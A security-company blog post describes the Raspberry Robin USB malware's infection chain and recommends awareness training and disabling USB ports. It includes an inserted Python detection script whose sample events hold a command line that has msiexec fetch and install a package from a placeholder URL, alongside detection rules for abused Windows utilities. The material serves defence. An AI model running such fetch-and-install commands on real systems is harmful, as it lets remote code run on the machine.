Beware Random Thumb Drives: Raspberry Robin Malware…

May 6, 2022

As if any well-minded cybersecurity professional would be trusting of the little buggers in the first place. Anywho, there’s a new malware making the rounds. It’s called Raspberry Robin and it lives almost exclusively on compromised USB drives.

The malware was first noticed in September of 2021 by the team over at Red Canary, a managed detection and response firm. According to researchers, the life cycle of Raspberry Robin is as follows:

  1. Infected USB drive attached – Raspberry Robin is typically introduced by infected removable drives – such as USB devices – containing a malicious .LNK file
  2. cmd.exe and msiexec.exe commands – cmd.exe reads and executes a malicious file stored on the infected device, then msiexec.exe attempts to connect to a short URL (often QNAP-associated)
  3. Malicious .DLL download – If the external msiexec.exe connection is successful, it downloads and installs a malicious .DLL
  4. rundll32.exe and Windows utility misuse – rundll32.exe launches a legitimate Windows utility like odbcconf.exe to execute the malicious .DLL
  5. Ongoing command & control activity – regsvr32.exe, rundll32.exe, and dllhost.exe repeatedly attempt outbound network connections, typically to Tor nodes
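The lifecycle above is a chain of ordinary Windows binaries doing unusual things, so it detects best when several stages line up on one host. The script below is an added example (not from the original post or Red Canary) that scores constructed Sysmon-style events against that chain; host names, paths and the short URL are invented placeholders, and the "any drive letter but C:" rule is a heuristic to tune for your fleet.

```python
import re
from collections import defaultdict

# Constructed sample of Sysmon-style telemetry (process creation and network
# connection events). Field names, host names, paths and URLs are assumptions
# made for this example; they are not indicators from the Red Canary report.
SAMPLE_EVENTS = [
    {"host": "WS01", "type": "process", "image": "cmd.exe", "parent": "explorer.exe",
     "cmdline": "cmd.exe /c E:\\setup.cmd"},
    {"host": "WS01", "type": "process", "image": "msiexec.exe", "parent": "cmd.exe",
     "cmdline": "msiexec.exe /q /i http://short.example/x"},
    {"host": "WS01", "type": "process", "image": "odbcconf.exe", "parent": "rundll32.exe",
     "cmdline": "odbcconf.exe /a {REGSVR C:\\Users\\Public\\x.dll}"},
    {"host": "WS01", "type": "network", "image": "dllhost.exe", "outbound": True},
    # Benign activity on a second host: a local MSI install and an ordinary rundll32 call.
    {"host": "WS02", "type": "process", "image": "msiexec.exe", "parent": "explorer.exe",
     "cmdline": "msiexec.exe /i C:\\Installers\\app.msi"},
    {"host": "WS02", "type": "process", "image": "rundll32.exe", "parent": "svchost.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
]

# Heuristic: treat any drive letter other than C: as removable; tune for your fleet.
REMOVABLE_DRIVE = re.compile(r"\b[D-Z]:\\", re.IGNORECASE)
URL_IN_CMDLINE = re.compile(r"https?://", re.IGNORECASE)
C2_IMAGES = {"regsvr32.exe", "rundll32.exe", "dllhost.exe"}

def classify(event):
    """Map one event to the Raspberry Robin lifecycle stage it resembles, or None."""
    image = event["image"].lower()
    parent = event.get("parent", "").lower()
    cmdline = event.get("cmdline", "")
    if event["type"] == "process":
        if image == "cmd.exe" and parent == "explorer.exe" and REMOVABLE_DRIVE.search(cmdline):
            return "cmd_from_removable_drive"
        if image == "msiexec.exe" and URL_IN_CMDLINE.search(cmdline):
            return "msiexec_remote_url"
        if image == "odbcconf.exe" and parent == "rundll32.exe":
            return "odbcconf_via_rundll32"
    elif event["type"] == "network" and image in C2_IMAGES and event.get("outbound"):
        return "lolbin_outbound_connection"
    return None

def find_suspect_hosts(events, min_stages=2):
    """Group stage hits per host; alert only when several stages of the chain coincide."""
    stages = defaultdict(set)
    for event in events:
        stage = classify(event)
        if stage:
            stages[event["host"]].add(stage)
    return {host: sorted(s) for host, s in stages.items() if len(s) >= min_stages}
```

A single hit such as rundll32.exe going online is common benign noise, which is why the host-level threshold, not the individual rule, is what produces the alert.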

What does that mean?

So, basically, Raspberry Robin lives on external drives, like USB drives, memory cards, whatnot. When they’re plugged into a Windows machine, they begin a process of downloading a payload. After the payload is downloaded, the malware uses cmd.exe to execute it.

Raspberry Robin uses legitimate Windows utilities like fodhelper.exe, rundll32.exe (which launches a further rundll32.exe) and odbcconf.exe to bypass User Account Control (UAC).

Nobody’s sure what Raspberry Robin actually does yet, however. Upon installation, the malware reaches out to various nodes associated with Tor. Red Canary has been unable to decipher what happens next, if anything.

“We also don’t know why Raspberry Robin installs a malicious DLL,” the researchers said. “One hypothesis is that it may be an attempt to establish persistence on an infected system.”

How can you protect yourself?

The two things that come to mind first are these:

  1. Security Awareness Training
  2. Disable USB access on endpoints

Why Security Awareness Training?

A healthy cybersecurity posture can only be formed on a strong foundation, made up of the combined efforts of a security-minded workforce. If the workforce is aware of the threats posed by plugging in a seemingly random USB drive found on a sidewalk outside your place of business, malware like Raspberry Robin can’t take hold in the first place.

No matter what you do, no matter what cybersecurity implementation you put in place, you’ll only ever be as strong as your weakest link. By educating the masses (so to speak) you’re bolstering every other cybersecurity endeavor you’re putting in place to keep the business safe. You’re closing gaps rather than opening them.

You can learn more about Security Awareness Training here: https://www.security7.net/solutions/managed-services/security-awareness-training

Why disable USB access on endpoints?

No matter what you do, there’s going to be one meathead in the organization who either forgets their security awareness training or didn’t care about security awareness training to begin with and likes to live life on the edge, plugging anything they find in immediately, just to see what’s on it.

If you disable USB access on your endpoints, no matter what the meathead does, they won’t be successful in their endeavor. In some cases, this might really be the only way to stop curiosity from killing that damn cat.

Carl Keyser is the Content Manager at Integris.
